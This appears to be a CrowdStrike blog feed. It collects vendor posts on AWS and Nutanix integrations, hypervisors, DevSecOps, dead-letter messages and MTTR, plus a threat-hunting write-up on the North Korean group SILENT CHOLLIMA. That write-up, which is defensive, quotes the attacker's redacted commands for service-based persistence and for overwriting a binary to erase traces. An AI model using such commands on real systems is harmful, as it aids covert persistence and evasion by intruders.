There are new articles available, click to refresh the page.
✇ CrowdStrike

CrowdStrike Announces Expanded Partnership at AWS re:Invent 2021

By: Shawn Wells

We’re ready to meet you in person in Las Vegas! CrowdStrike is a proud Gold sponsor of AWS re:Invent 2021, being held Nov. 29 through Dec. 3. Stop by Booth #152 at the Venetian for a chance to obtain one of our new limited-edition adversary figures while supplies last. (More details below.) Plus, connect 1:1 with a CrowdStrike expert in person. Register today so you don’t miss out on CrowdStrike in action! Check out what else we have to offer here

Here’s a sneak peek.

What’s New 

At AWS re:Invent 2021, we are announcing expansions to our strategic partnership with AWS to provide breach protection and control for edge computing workloads running on cloud and customer-managed infrastructure, providing simplified infrastructure management and security consolidation, without impact to productivity. 

Build with AWS, Secure with CrowdStrike

AWS Outposts Rack (42U), AWS Outposts Servers (1U and 2U) 

CrowdStrike is proud to be a launch partner of AWS Outposts 1U and 2U servers and is now compatible with the AWS Outposts rack. AWS Outposts is a fully managed service that offers the same AWS infrastructure, AWS services, APIs and tools to on-premises data centers, co-location space, or edge locations like retail stores, branch offices, factories and office locations for a truly consistent hybrid experience. AWS Outposts is ideal for workloads that require low latency access to on-premises systems, local data processing, data residency and migration of applications with local system interdependencies. As a launch partner, this allows CrowdStrike to provide complete end-to-end visibility and protection for a customer’s AWS Hybrid environments as well as Internet of Things (IoT) and edge computing use cases.  

CrowdStrike Achieves EKS Anywhere Certification

Amazon EKS Anywhere is a new deployment option for Amazon EKS that allows customers to create and operate Kubernetes clusters on customer-managed infrastructure, supported by AWS. Starting today, AWS customers can now run Amazon EKS Anywhere on their own on-premises infrastructure using VMware vSphere. Now, with the Amazon EKS Anywhere certification, joint CrowdStrike and AWS solutions deliver end-to-end protection from the host to the cloud, delivering greater visibility, compliance, and threat detection and response to outsmart the adversary. CrowdStrike supports development and production of Amazon EKS workloads across Amazon EKS, Amazon EKS with AWS Fargate, and now Amazon EKS Anywhere.

Humio Log Management Integrations with AWS Services 

Humio‘s purpose-built, large-scale log management platform is now more tightly integrated with a number of AWS services, including AWS Quick Starts and AWS FireLens

  • AWS Quick Starts for Humio: AWS Quick Starts are automated reference deployments built by AWS solutions architects and AWS Partners. AWS Quick Starts help you deploy popular technologies on AWS according to AWS best practices. Joint customers will be able to initiate Humio clusters via AWS Quick Starts Templates to reduce manual procedures to just a few steps, empowering customers to start attaining Humio’s streaming observability at scale and with consistency, within minutes.
  • Humio Integration with AWS FireLens: Customers are now able to ingest AWS service and event data into Humio via AWS FireLens container log router for Amazon ECS and AWS Fargate. Humio customers will now have greater extensibility to use the breadth of services at AWS to simplify routing of logs to Humio, enabling accelerated threat hunting and search across their AWS footprint for novel and advanced cyber threats.

AWS Security Hub Integration Now Supports AWS GovCloud 

CrowdStrike Falcon already integrates with AWS Security Hub to enable a comprehensive, real-time view of high-priority security alerts. CrowdStrike’s API-first approach sends alerts back into AWS Security Hub and accelerates investigation, ultimately helping to automate security tasks. 

We have now extended this integration to publish detections identified by CrowdStrike Falcon for workloads residing within AWS GovCloud to AWS Security Hub to assist customers operating in highly regulated environments, such as the U.S. public sector. This will allow customers’ security operations center (SOC) and DevOps team to streamline communications and simultaneously view and access the same cybersecurity event data. 

CrowdStrike and AWS Partnership 

CrowdStrike is an AWS Partner Network (APN) Advanced Technology Partner, a global partner program to leverage AWS business, technical and marketing support to build solutions for customers. In addition, CrowdStrike has passed the technical review for the AWS Well Architected ISV Certification. By achieving this certification, CrowdStrike has proven to adopt AWS best practices to lower costs, drive better security and performance, adopt cloud-native architectures, drive industry compliance and scale to meet traffic demands. CrowdStrike product offerings are available in the AWS Marketplace.

The Powerful Benefits of CrowdStrike and AWS 

Our joint solutions and integrations in various AWS services are powered by CrowdStrike Threat Graph®, which captures trillions of high-fidelity signals per day in real time from across the globe. Customers benefit from better protection, better performance and immediate time-to-value delivered by the cloud-native Falcon platform, designed to stop breaches. With over 14 service level integrations available, joint AWS and CrowdStrike customers are provided a consistent security posture between their on-premises workloads and those running in the AWS Cloud.

  • Unified, hybrid security experience: To reiterate, CrowdStrike supports development and production of Amazon EKS workloads across Amazon EKS, Amazon EKS with AWS Fargate, and Amazon EKS Anywhere. With a single lightweight agent and single management console, customers can experience a unified, end-to-end experience from the host to the cloud. No matter where the compute workloads are located, customers benefit from visibility, compliance, and threat detection and response to outsmart the adversary.
  • Real-time observability at enterprise scale: Humio offers the freedom to log hundreds of terabytes a day with no compromises. Now with the direct integration with AWS FireLens, customers have complete visibility to see anomalies, threats and problems to get to the root of anything nefarious that has happened across their AWS infrastructure in real time.
  • A modern and consistent security approach: The latest integrations, support and certifications from CrowdStrike for AWS allow organizations to implement a modern enterprise security approach where protection is provided across your AWS infrastructure to defend against sophisticated threat activity. 

Visit CrowdStrike at Booth #152

Come by Booth #152 for a chance to win your own adversary figure, engage in product demos and chat with CrowdStrike experts.

How to Obtain Your Own Adversary Figure 

Earn a limited-edition adversary collectable card for each step you complete. Then show your three collectable cards to a CrowdStrike representative at our giveaway station in our booth, and you’ll be rewarded with your very own adversary figure while supplies last! 

  1. Listen to a theater presentation at the CrowdStrike booth 
  2. Engage in a product demo at one of our demo stations
  3. Snap a selfie and tag #GoCrowdStrike (we will have adversary masks in the booth)

Meet 1:1 with a CrowdStrike Executive

CrowdStrike will have executives and leaders attending AWS re:Invent in person. If you’re interested in a 1:1 onsite meeting, please fill out the form here

Questions? Please contact [email protected]. We look forward to seeing you at AWS re:Invent 2021!

Additional Resources

✇ CrowdStrike

What Is a Hypervisor (VMM)?

By: Humio Staff

This blog was originally published on humio.com. Humio is a CrowdStrike Company.

What is a hypervisor?

hypervisor, or virtual machine monitor (VMM), is virtualization software that creates and manages multiple virtual machines (VMs) from a single physical host machine.

Acting as a VMM, the hypervisor monitors, pools and allocates resources — like CPU, memory and storage — across all guest VMs. By centralizing these assets, it’s possible to significantly reduce each VM’s energy consumption, space allocation and maintenance requirements while optimizing overall system performance.

Why should you use a hypervisor?

In addition to helping the IT team better monitor and utilize all available resources, a hypervisor unlocks a wide range of benefits. These include:

  • Speed and scalability: Hypervisors can create new VMs instantly, which allows organizations to quickly scale to meet changing business needs. In the event an application needs more processing power, the hypervisor can also access additional machines on a different server to address this demand.
  • Cost and energy efficiency: Using a hypervisor to create and run several VMs from a common host is far more cost- and energy-efficient than running several physical machines to complete the same tasks.
  • Flexibility: A hypervisor separates the OS from underlying physical hardware. As a result, the guest VM can run a variety of software and applications since the system does not rely on specific hardware.
  • Mobility and resiliency: Hypervisors logically isolate VMs from the host hardware. VMs can therefore be moved freely from one server to another without risk of disruption. Hypervisors can also isolate one guest virtual machine from another; this eliminates the risk of a “domino effect” if one virtual machine crashes.
  • Replication: Replicating a VM manually is a time-intensive and potentially complex process. Hypervisors automate the replication process for VMs, allowing staff to focus on more high-value tasks.
  • Restoration: A hypervisor has built-in stability and security features, including the ability to take a snapshot of a VM’s current state. Once this snapshot is taken, the VM can revert to this state if needed. This is particularly useful when carrying out system upgrades or maintenance as the VM can be restored to its previous functioning state if the IT team encounters an error.

Types of hypervisors

There are two main types of hypervisors:

  1. Type 1 hypervisor: Native or bare metal hypervisor
  2. Type 2 hypervisor: Hosted or embedded hypervisor

Type 1 hypervisor: native or bare metal hypervisor

type 1 hypervisor installs virtualization software directly on the hardware, hence the name bare metal hypervisor.

In this model, the hypervisor takes the place of the OS. As a result, these hypervisors are typically faster since all computing power can be dedicated to guest virtual machines, as well as more secure since adversaries cannot target vulnerabilities within the OS.

That said, a native hypervisor tends to be more complex to set up and operate. Further, a type 1 hypervisor has somewhat limited functionality since the hypervisor itself basically serves as an OS.

Type 2 hypervisor: hosted or embedded hypervisor

Unlike bare-metal hypervisors, a hosted hypervisor is deployed as an added software layer on top of the host operating system. Multiple operating systems can then be installed as a new layer on top of the host OS.

In this model, the OS acts as a weigh station between the hardware and hypervisor. As a result, a type 2 hypervisor tends to have higher latency and slower performance. The presence of the OS also makes this type more vulnerable to cyberattacks.

Embedded hypervisors are generally more convenient to build and launch than a Type 1 hypervisor since they do not require a management console or dedicated machine to set up and oversee the VMs. A hosted hypervisor may also be a good choice for use cases where latency is not a concern, such as software testing.

Cloud hypervisors

The shift to the cloud and cloud computing is prompting the need for cloud hypervisors. The cloud hypervisor focuses exclusively on running VMs in a cloud environment (rather than on physical devices).

Due to the cloud’s flexibility, speed and cost savings, businesses are increasingly migrating their VMs to the cloud. A cloud hypervisor can provide the tools to migrate them more efficiently, allowing companies to make a faster return on investment on their transformation efforts.

Differences between containers and hypervisors

Containers and hypervisors both ensure applications run more efficiently by logically isolating them within the system. However, there are significant differences between how the two are structured, how they scale and their respective use cases.

A container is a package of only software and its dependencies, such as code, system tools, settings and libraries. It can run reliably on any operating system and infrastructure. A container consists of an entire runtime environment, enabling applications to move between a variety of computing environments, such as from a physical machine to the cloud, or from a developer’s test environment to staging and then production.

Hypervisors vs containers

Hypervisors host one or more VMs that mimic a collection of physical machines. Each VM has its own independent OS and is effectively isolated from others.

While VMs are larger and generally slower compared to containers, they can run several applications and different operating systems simultaneously. This makes them a good solution for organizations that need to run multiple applications or legacy software that requires an outdated OS.

Containers, on the other hand, often share an OS kernel or base image. While each container can run individual applications or microservices, it is still linked to the underlying kernel or base image.

Containers are typically used to host a single app or microservice without any other overhead. This makes them more lightweight and flexible than VMs. As such, they are often used for tasks that require a high level of scalability, portability and speed, such as application development.

Understanding hypervisor security

On one hand, by isolating VMs from one another, a hypervisor effectively contains attacks on an individual VM. Also, in the case of type 1 or bare metal hypervisors, the absence of an operating system significantly reduces the risk of an attack since adversaries cannot exploit vulnerabilities within the OS.

At the same time, the hypervisor host itself can be subject to an attack. In that case, each guest machine and their associated data could be vulnerable to a breach.

Best practices for improving hypervisor security

Here are some best practices to consider when integrating a hypervisor within the organization’s IT architecture:

  • Minimize the attack surface by limiting a host’s role to only operating VMs
  • Conduct regular and timely patching for all software applications and the OS
  • Leverage other security measures, such as encryption, zero trust and multi-factor authentication (MFA) to ensure user credentials remain secure
  • Limit administrative privileges and the number of users in the system
  • Incorporate the hypervisor within the organization’s cybersecurity architecture for maximum protection

Hypervisors and modern log management

With the growth of microservices and migration to disparate cloud environments, maintaining observability has become increasingly difficult. Additionally, challenges such as application availability, bugs/vulnerabilities, resource use and changes to performance in virtual machines/containers that affect end-user experience continues to affect the community. Organizations operating with a continuous delivery model are further troubled with capturing and understanding the dependencies within the application environment.

Humio’s streaming log management solution can access and ingest real-time data streaming from diverse platforms and accurately log network issues, database connections and availability, and information about what’s happening in a container that the application relies on. In addition to providing visibility across the entire infrastructure, developers can benefit from comprehensive root cause investigation and analysis. Humio enables search across all relevant data with longer data-retention and long-term storage.

Humio Community Edition

Try Humio’s log management solution at no cost with ongoing access here!

✇ CrowdStrike

Nowhere to Hide: Detecting SILENT CHOLLIMA’s Custom Tooling

By: Falcon OverWatch Team

CrowdStrike Falcon OverWatch™ recently released its annual threat hunting report, detailing the interactive intrusion activity observed by hunters over the course of the past year. The tactics, techniques and procedures (TTPs) an adversary uses serve as key indicators to threat hunters of who might be behind an intrusion. OverWatch threat hunters uncovered an intrusion against a pharmaceuticals organization that bore all of the hallmarks of one of the Democratic People’s Republic of Korea (DPRK) threat actor group: SILENT CHOLLIMA. For further detail, download the CrowdStrike 2021 Threat Hunting Report today.

Threat Hunters Uncover SILENT CHOLLIMA’s Custom Tooling

OverWatch threat hunters detected a burst of suspicious reconnaissance activity in which the threat actor used the Smbexec tool under a Windows service account. Originally designed as a penetration testing tool, Smbexec enables covert execution by creating a Windows service that is then used to redirect a command shell operation to a remote location over Server Message Block (SMB) protocol. This approach is valuable to threat actors, as they can perform command execution under a semi-interactive shell and run commands remotely, ultimately making the activity less likely to trigger automated detections.

As OverWatch continued to investigate the reconnaissance activity, the threat actor used Smbexec to remotely copy low-prevalence executables to disk and execute them. The threat hunters quickly called on CrowdStrike Intelligence, who together were able to quickly determine the files were an updated variant of Export Control — a malware dropper unique to SILENT CHOLLIMA.

SILENT CHOLLIMA then proceeded to load two further custom tools. The first was an information stealer, named GifStealer, which runs a variety of host and network reconnaissance commands and archives the output within individual compressed files. The second was Valefor, a remote access tool (RAT) that uses Windows API functions and utilities to enable file transfer and data collection capabilities.

OverWatch Contains Adversary Activity

Throughout the investigation, OverWatch threat hunters alerted the victim organization to the malicious activity occurring in the environment. As the situation developed, OverWatch continued to alert the organization, eventually informing them of the emerging attribution of this activity to SILENT CHOLLIMA. 

Because this activity originated from a host without the CrowdStrike Falcon® sensor, OverWatch next worked with the organization to expand the rollout of the Falcon sensor so the full scope of threat actor activity could be assessed. Increasing the organization’s coverage and visibility into the intrusion, threat hunters identified six additional compromised hosts. Through further collaboration with the organization, OverWatch was able to relay their findings in a timely manner, empowering the organization to contain and remove SILENT CHOLLIMA from their network. 

OverWatch discovered a service creation event that was configured to execute the Export Control loader every time the system reboots, allowing the threat actor to maintain persistence if they temporarily lose connection.

sc create [REDACTED] type= own type= interact start= auto error=ignore binpath= "cmd /K start C:\Windows\Resources\[REDACTED].exe"

The threat actor was also mindful to evade detection by storing their Export Control droppers and archived reconnaissance data within legitimate local directories. By doing this, threat actors attempt to masquerade the files as benign activity. The threat actor continued its evasion techniques, removing traces of the collected GifStealer archives by deleting them and overwriting the GifStealer binary itself using the string below. This technique is another hallmark of SILENT CHOLLIMA activity.

"C:\Windows\system32\cmd.exe" /c ping -n 3 >NUL & echo EEEE > "C:\Windows\Temp\[REDACTED]"

Conclusions and Recommendations

The OverWatch team exposed multiple signs of malicious tradecraft in the early stages of this intrusion, which proved to be vital to the victim organization’s ability to successfully contain the campaign and remove the threat actor from its networks. In this instance, OverWatch worked with the organization to rapidly expand Falcon sensor coverage. Though the Falcon sensor can be deployed and operational in just seconds, OverWatch strongly recommends that defenders roll out endpoint protection consistently and comprehensively across their environment from the start to ensure maximum coverage and visibility for threat hunters. OverWatch routinely sees security blind spots become a safe haven from which adversaries can launch their intrusions.  The Falcon sensor was built with scalability in mind, allowing an organization to reach a strong security posture by protecting all enterprise endpoints in mere moments.

The expertise of OverWatch’s human threat hunters was pivotal in this instance, as it was the threat hunters ability to leverage their expertise that allowed them to discern the SMB activity was indeed malicious. 

For defenders concerned about this type of activity, OverWatch recommends monitoring: 

  • Service account activity, limiting access where possible
  • Service creation events within Windows event logs to hunt for malicious SMB commands
  • Remote users connecting to administrator shares, as well as other commands and tools that can be used to connect to network shares

Ultimately, threat hunting is a full time job. Defenders should also consider hiring a professional managed threat hunting service, like OverWatch, to secure their networks 24/7/365. 

Additional Resources

✇ CrowdStrike

Shift Left Security: The Magic Elixir for Securing Cloud-Native Apps

By: David Puzas

Developing applications quickly has always been the goal of development teams. Traditionally, that often puts them at odds with the need for testing. Developers might code up to the last minute, leaving little time to find and fix vulnerabilities in time to meet deadlines. 

During the past decade, this historical push-pull between security and developers led many organizations to look to build security deeper into the application development lifecycle. This new approach, “shift-left security,” is a pivotal part of supporting the DevOps methodology. By focusing on finding and remediating vulnerabilities earlier, organizations can streamline the development process and improve velocity. 

Cloud computing empowers the adoption of DevOps. It offers DevOps teams a centralized platform for testing and deployment. But for DevOps teams to embrace the cloud, security has to be at the forefront of your considerations. For developers, that means making security a part of the continuous integration/continuous delivery (CI/CD) pipeline that forms the cornerstone of DevOps practices.

Out with the Old and In with the New

The CI/CD pipeline is vital to supporting DevOps through the automation of building, testing and deploying applications. It is not enough to just scan applications after they are live. A shift-left approach to security should start the same second that DevOps teams begin developing the application and provisioning infrastructure. By using APIs, developers can integrate security into their toolsets and enable security teams to find problems early. 

Speedy delivery of applications is not the enemy of security, though it can seem that way. Security is meant to be an enabler, an elixir that helps organizations use technology to reach their business goals. Making that a reality, however, requires making it a foundational part of the development process. 

In our Buyer’s Guide for Cloud Workload Protection Platforms, we provide a list of key features we believe organizations should look for to help secure their cloud environments. Automation is crucial. In research from CrowdStrike and Enterprise Strategy Group (ESG), 41% of respondents said that automating the introduction of controls and processes via integration with the software development lifecycle and CI/CD tools is a top priority. Using automation, organizations can keep pace with the elastic, dynamic nature of cloud-native applications and infrastructure.

Better Security, Better Apps

At CrowdStrike, we focus on integrating security into the CI/CD pipeline. As part of the functionality of CrowdStrike’s Falcon Cloud Workload Protection (CWP), customers have the ability to create verified image policies to ensure that only approved images are allowed to progress through the CI/CD pipeline and run in their hosts or Kubernetes clusters. 

The tighter the integration between security and the pipeline, the earlier threats can be identified, and the more the speed of delivery can be accelerated. By seamlessly integrating with Jenkins, Bamboo, GitLab and others, Falcon CWP allows DevOps teams to respond and remediate incidents even faster within the toolsets they use. 

Falcon CWP also continuously scans container images for known vulnerabilities, configuration issues, secrets/keys and OSS licensing issues, and streamlines visibility for security operations by providing insights and context for misconfigurations and compliance violations. It also uses reporting and dashboards to drive alignment across the security operations, DevOps and infrastructure teams. 

Hardening the CI/CD pipeline allows DevOps teams to move fast without sacrificing security. The automation and integration of security into the CI/CD pipeline transforms the DevOps culture into its close relative, DevSecOps, which extends the methodology of DevOps by focusing on building security into the process. As businesses continue to adopt cloud services and infrastructure, forgetting to keep security top of mind is not an option. The CI/CD pipeline represents an attractive target for threat actors. Its criticality means that a compromise could have a significant impact on business and IT operations. 

Baking security into the CI/CD pipeline enables businesses to pursue their digital initiatives with confidence and security. By shifting security left, organizations can identify misconfigurations and other security risks before they impact users. Given the role that cloud computing plays in enabling DevOps, protecting cloud environments and workloads will only take on a larger role in defending the CI/CD pipeline, your applications and, ultimately, your customers. 

To learn more about how to choose security solutions to protect your CI/CD pipeline, download the CrowdStrike Cloud Workload Protection Platform Buyers Guide.

Additional Resources

✇ CrowdStrike

Managing Dead Letter Messages: Three Best Practices to Effectively Capture, Investigate and Redrive Failed Messages

By: Chris Cannon

In a recent blog post, Sharding Kafka for Increased Scale and Reliability, the CrowdStrike Engineering Site and Reliability Team shared how it overcame scaling limitations within Apache Kafka so that they could quickly and effectively process trillions of events daily. In this post, we focus on the other side of this equation: What happens when one of those messages inevitably fails? 

When a message cannot be processed, it becomes what is known as a “dead letter.” The service attempts to process the message by normal means several times to eliminate intermittent failures. However, when all of those attempts fail, the message is ultimately “dead lettered.” In highly scalable systems, these failed messages must be dealt with so that processing can continue on subsequent messages. To retain the dead letter’s information and continue processing messages, the message is stored so that it can be later addressed manually or by an automated tool.

In Best Practices: Improving Fault-Tolerance in Apache Kafka Consumer, we go into great detail about the different failure types and techniques for recovery, which include redriving and dead letters. Here our aim is to solidify those terms and expound upon the processes surrounding these mechanisms. 

Processing dead letters can be a fairly time-consuming and error-prone process. So what can be done to expedite this task and improve its outcome? Here we explore three steps organizations can take to develop the code and infrastructure needed to more effectively and efficiently capture, investigate and redrive dead letter messages.

Dead Letter Basics
What is a message? A message is the record of any communication between two or more services.
Why does a message fail? Messages can fail for a variety of reasons, some of the most common being incompatible message format, unavailable dependent services, or a bug in the service processing the message.
Why does it matter if a message fails? In most cases, a message is being sent because it is sharing important information with another service. Without that knowledge, the service that should be receiving the message can have outdated or inaccurate information and make bad decisions or be completely unable to act.

Three Best Practices for Resolving Dead Letter Messages

1. Define the infrastructure and code to capture and redrive dead letters

As explained above, a dead letter occurs when a service cannot process a message. Most systems have some mechanism in place, such as a log or object storage, to capture the message, review it, identify the issue, resolve the issue and then retry the message once it’s more likely to succeed. This act of replaying the message is known as “redriving.” 

To enable the redrive process, organizations need two basic things: 1) the necessary infrastructure to capture and store the dead letter messages, and 2) the right code to redrive that message.

Since there could potentially be hundreds of millions of dead letters that need to be stored, we recommend using a storage option that meets these four criteria: low cost (especially critical as your data scales), abundant space (no concerns around running out of storage space), durability (no data loss or corruption) and availability (the data is available to restore during disaster recovery). We use Amazon S3. 

For short-term storage and alerting, we recommend using a message queue technology that allows the user to send messages to be processed at a later point. Then your service can be configured to read from the message queue to begin processing the redrive messages. We use Amazon SQS and Kafka as our message queues.

2. Put tooling in place to make remediation foolproof 

The process outlined above can be very error-prone when done manually, as it involves many steps: finding the message, copying its contents, pasting it into a new message and submitting that message to the queue. If the user misses even one character when copying the message, then it will fail again — and the process will need to be repeated. This process must be done for every failed message, making it potentially time-consuming as well. 

Since the process is the same for processing dead letters, it is possible to automate. To that end, organizations should develop a command-line tool to automate common actions with dead letters such as viewing the dead letter, putting the message in the redrive queue and having the service consume messages from the queue for reprocessing. Engineers will use this command-line tool to diagnose and resolve dead letters the same way — this, in turn, will help reduce the risk of human error.

3. Standardize and document the process to ensure ease-of-use 

Our third best practice is around standardization. Because not all engineers will be familiar with the process the organization has for dealing with dead letter messages, it is important to document all aspects of the procedure. Some basic questions your documentation should address include: 

  • How does the organization know when a dead letter message occurs? Is an alert set up? Will an email be sent?
  • How does the team investigate the root cause of the error? Is there a specific phrase they can search for in the logs to find the errors associated with a dead letter?
  • Once it has been investigated and a fix has been deployed, how is the message reprocessed or redrived?

Documenting and standardizing the process in this way ensures that anyone on the team can pick up, solve and redrive dead letters. Ideally, the documentation will be relatively short and intuitive, outlining the following steps:

  • How to read the content of the message and review the logs to help figure out what happened
  • How to run the commands for your dead letter tool
  • How to put the message in the redrive queue to be reprocessed
  • What to do if the message is rejected again

It’s important to have this “cradle-to-grave” mentality when dealing with dead letter messages — pun intended — since a disconnect anywhere within the process could prevent the organization from successfully reprocessing the message.


While many organizations focus on processing massive amounts of messages and scaling those capabilities, it is equally important to ensure errors are captured and solved efficiently and effectively. 

In this blog, we shared our three best practices for organizations to develop the infrastructure and tooling to ensure that any engineer can properly manage a dead letter. But we certainly have more to share! We would be happy to address any specific questions or explore related topics of interest to the community in future blog posts. 

Got a question, comment or idea? Feel free to share your thoughts for future posts on social media via @CrowdStrike.

✇ CrowdStrike

Mean Time to Repair (MTTR) Explained

By: Humio Staff

This blog was originally published oct. 28, 2021 on humio.com. Humio is a CrowdStrike Company.

Definition of MTTR

Mean time to repair (MTTR) is a key performance indicator (KPI) that represents the average time required to restore a system to functionality after an incident. MTTR is used along with other incident metrics to assess the performance of DevOps and ITOps, gauge the effectiveness of security processes, evaluate the effectiveness of security solutions, and measure the maintainability of systems.

Service level agreements with third-party providers typically set expectations for MTTR, although repair times are not guaranteed because some incidents are more complex than others. Along the same lines, comparing the MTTR of different organizations is not fruitful because MTTR is highly dependent on unique factors relating to the size and type of the infrastructure and the size and skills of the ITOps and DevOps team. Every business has to determine which metrics will best serve its purposes and how it will put them into action in their unique environment.

Difference Between Common Failure Metrics

Modern enterprise systems are complicated and they can fail in numerous ways. For these reasons, there is no one set of incident metrics every business should use — but there are many to choose from, and the differences can be nuanced.

Mean Time to Detect (MTTD)

Also called mean time to discover, MTTD is the average time between the beginning of a system failure and its detection. As a KPI, MTTD is used to measure the effectiveness of the tools and processes used by DevOps teams.

To calculate MTTP, select a period of time, such as a month, and track the times between the beginning of system outages and their discovery, and then add up the total time and divide it by the number of incidents to find the average. MTTD should be low. If it continues to take longer to detect or or discover system failures (an upward trend), an immediate review should be conducted of the existing incident response management tools and processes.

Mean Time to Identify (MTTI)

This measurement tracks the number of business hours between the moment an alert is triggered and the moment the cybersecurity team begins to investigate that alert. MTTI is helpful in understanding if alert systems are effective and if cybersecurity teams are staffed to the necessary capacity. A high MTTI or an MTTI that is trending in the wrong direction can be an indicator that the cybersecurity team is suffering from alert fatigue.

Mean Time to Recovery (MTTR)

Mean time to recovery is the average time it takes in business hours between the start of an incident and the complete recovery back to normal operations. This incident metric is used to understand the effectiveness of the DevOps and ITOps teams and identify opportunities to improve their processes and capabilities.

Mean Time to Resolve (MTTR)

Mean time to resolve is the average time between the first alert through the post-incident analysis, including the time spent ensuring the failure will not re-occur. It is measured in business hours.

Mean Time Between Failures (MTBF)

Mean time between failures is a key performance metric that measures system reliability and availability. ITOps teams use MTBF to understand which systems or components are performing well and which need to be evaluated for repair or replacement. Knowing MTBF enables preventative maintenance, minimizes reactive maintenance, reduces total downtime and enables teams to prioritize their workload effectively. Historical MTBF data can be used to make better decisions about scheduling maintenance downtime and resource allocation.

MTBF is calculated by tracking the number of hours that elapse between system failures in the ordinary course of operations over a period of time and then finding the average.

Mean Time to Failure (MTTF)

Mean time to failure is a way of looking at uptime vs. downtime. Unlike MTBF, an incident metric that focuses on repairability, MTTF focuses on failures that cannot be repaired. It is used to predict the lifespan of systems. MTTF is not a good fit for every system. For example, systems with long lifespans, such as core banking systems or many industrial control systems, are not good subjects for MTTF metrics because they have such a long lifespan that when they are finally replaced, the replacement will be an entirely different type of system due to technological advances. In cases like that, MTTF is moot.

Conversely, tracking the MTTF of systems with more typical lifespans is a good way to gain insight into which brands perform best or which environmental factors most strongly influence a product’s durability.

MTTR is intended to reduce unplanned downtime and shorten breakout time. But its use also supports a better culture within ITOps teams.When incidents are repaired before users are impacted, DevOps and ITOps are seen as efficient and effective. Resilient system design is encouraged because when DevOps knows its performance will be measured by MTTR, the team will build apps that can be repaired faster, such as by developing apps that are populated by discrete web services so one service failure will not crash the entire app. MTTR, when done properly, includes post-incident analysis, which should be used to inform a feedback loop that leads to better software builds in the future and encourages the fixing of bugs early in the SDLC process.

How to Calculate Mean Time to Repair

The MTTR formula is straightforward: Simply add up the total unplanned repair time spent on a system within a certain time frame and divide the results by the total number of relevant incidents.

For example, if you have a system that fails four times in one workday and you spend an hour repairing each of those instances of failure, your MTTR would be 15 minutes (60 minutes / 4 = 15 minutes).

However, not all outages are equal. The time spent repairing a failed component or a customer-facing system that goes down during peak hours is more expensive in terms of lost sales, productivity or brand damage than time spent repairing a non-critical outage in the middle of the night. Organizations can establish an “error budget” that specifies that each minute spent repairing the most impactful systems is worth an hour of minutes spent repairing less impactful ones. This level of granularity will help expose the true costs of downtime and provide a better understanding of what MTTR means to the particular organization.

How to Reduce MTTR

There are three elements to reducing MTTR:

  1. Manage resolution process. The first is a defined strategy for managing the resolution process, which should include a post-incident analysis to capture lessons learned.
  2. Build defenses. Technology plays a crucial role, of course, and the best solution will provide visibility, monitoring and corrective maintenance to help root out problems and build defenses against future attacks.
  3. Mitigate the incident. Lastly, the skills necessary to mitigate the incident have to be available.

MTTR can be reduced by increasing budget or headcount, but that isn’t always realistic. Instead, deploy artificial intelligence (AI) and machine learning (ML) to automate as much of the repair process as possible. Those steps include rapid detection, minimization of false positives, smart escalation, and automated remediation that includes workflows that reduce MTTR.

MTTR can be a helpful metric to reduce downtime and streamline your DevOps and ITOps teams, but improving it shouldn’t be the end goal. After all, the point of using metrics is not simply improving numbers but, in this instance, the practical matter of keeping systems running and protecting the business and its customers. Use MTTR in a way that helps your teams protect customers and optimize system uptime.

Improve MTTR With a Modern Log Management Solution

Logs are invaluable for any kind of incident response. Humio’s platform enables complete observability for all streaming logs and event data to help IT organizations better prepare for the unknown and quickly find the root cause of any incident.

Humio leverages modern technologies, including data streaming, index-free architecture and hybrid deployments, to optimize compute resources and minimize storage costs. Because of this, Humio can collect structured and unstructured data in memory to make exploring and investigating data of any size blazing fast.

Humio Community Edition

With a modern log management platform, you can monitor and improve your MTTR. Try it out at no cost!

✇ CrowdStrike

Securing the Application Lifecycle with Scale and Speed: Achieving Holistic Workload Security with CrowdStrike and Nutanix

By: Fiona Ing

With virtualization in the data center and further adoption of cloud infrastructure, it’s no wonder why IT, DevOps and security teams grapple with new and evolving security challenges. An increase in virtualized applications and desktops have caused organizations’ attack surfaces to expand quickly, enabling highly sophisticated attackers to take advantage of the minimal visibility and control these teams hold.

The question remains: How can your organization secure your production environments and cloud workloads to ensure that you can build and run apps at speed and with confidence? The answer: CrowdStrike Falcon® on the Nutanix Cloud Platform.

Delivered through CrowdStrike’s single lightweight Falcon agent, your team is enabled to take an adversary-focused approach when securing your Nutanix cloud workloads — all without impacting performance. With scalable and holistic security, your team can achieve comprehensive workload protection and visibility across virtual environments to meet compliance requirements and prevent breaches effectively and efficiently. 

Secure All of Your Cloud Workloads with CrowdStrike and Nutanix

By extending CrowdStrike’s world-class security capabilities into the Nutanix Cloud Platform, you can prevent attacks on virtualized workloads and endpoints on or off the network. The Nutanix-validated, cloud-native Falcon sensor enhances Nutanix’s native security posture for workloads running on Nutanix AHV without compromising your team’s output. By extending CrowdStrike protection to Nutanix deployments, including virtual machines and virtual desktop infrastructure (VDI), you get scalable and comprehensive workload and container breach protection to streamline operations and optimize performance.

CrowdStrike and Nutanix provide your DevOps and Security teams with layered security, so they can build, run and secure applications with confidence at every stage of the application lifecycle. Easily deploy and use the CrowdStrike Falcon sensor without hassle for your Nutanix AHV workloads and environment. 

CrowdStrike’s intelligent cloud-native Falcon agent is powered by the proprietary CrowdStrike Threat Graph®, which captures trillions of high-fidelity signals per day in real time from across the globe, fueling one of the world’s most advanced data platforms for security. The Falcon platform helps you gain real-time protection and visibility across your enterprise, preventing attacks on workloads on and off the network. 

Get Started and Secure Your Linux Workloads in the Cloud

With Nutanix and CrowdStrike, you can feel confident that your Linux workloads are secure on creation by using CrowdStrike’s Nutanix Terraform script built on Nutanix’s Terraform Provider. By deploying the CrowdStrike Falcon sensor during Linux instance creation, the lifecycle of building and securing workloads before they are operational in the cloud is made simple and secure, without operational friction. 

Get started with CrowdStrike and Nutanix by deploying Linux workloads securely with CrowdStrike’s Nutanix Terraform script.

Gain Holistic Security Coverage Without Compromising Performance

With CrowdStrike and Nutanix, you can seamlessly secure your end-to-end production environment, streamline operations and optimize application performance; easily manage storage and virtualization securely with CrowdStrike’s lightweight Falcon agent on the Nutanix Cloud Platform; and secure your Linux workloads with CrowdStrike’s Nutanix Terraform solution. Building, running and securing applications on the Nutanix Cloud Platform takes the burden of managing and securing your production environment off your team and ensures confidence.

Additional Resources 

✇ CrowdStrike

Introduction to the Humio Marketplace

By: Humio Staff

This blog was originally published Oct. 11, 2021 on humio.com. Humio is a CrowdStrike Company.

